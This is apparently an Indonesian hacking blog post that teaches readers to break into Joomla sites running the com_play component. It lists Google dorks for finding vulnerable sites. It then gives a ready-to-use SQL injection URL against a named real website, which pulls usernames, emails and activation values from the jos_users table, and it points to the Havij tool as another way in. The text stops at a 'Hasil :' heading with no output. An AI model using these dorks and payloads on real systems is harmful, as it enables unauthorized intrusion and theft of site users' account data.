Exploit Joomla Com_Play

Assalamualaikum

lama tidak Muncul , kini r238 mau sharing seputar Exploit Joomla com_play . dalam exploit ini kita dapat mendapatkan Database web Joomla tersebut , seperti teknik SQLI ^_^ . oke langsung saja


#########################################################
1. Masukan Dorknya ke Google ^_^
DORK :
inurl:"com_play"
inurl:/index.php?option=com_play&view=play&playid=
inurl:"/index.php?option=complay"

2. Klik salah satu web hasil pencarian google .

3. setelah masuk kedalam web kalian bisa inject secara Manual :
Contoh :  

http://www.detnorsketeatret.no/index.php?option=com_play&view=play&playid=-185+union+select+1,2,3,4,5,group_concat(0x3a,username,0x3a,email,0x3a,activation ​,0x3a),7,8,9,10,11,12,13,14,15+from+jos_users--

atau kalian bisa scan sendiri dengan tools Havij .

Hasil :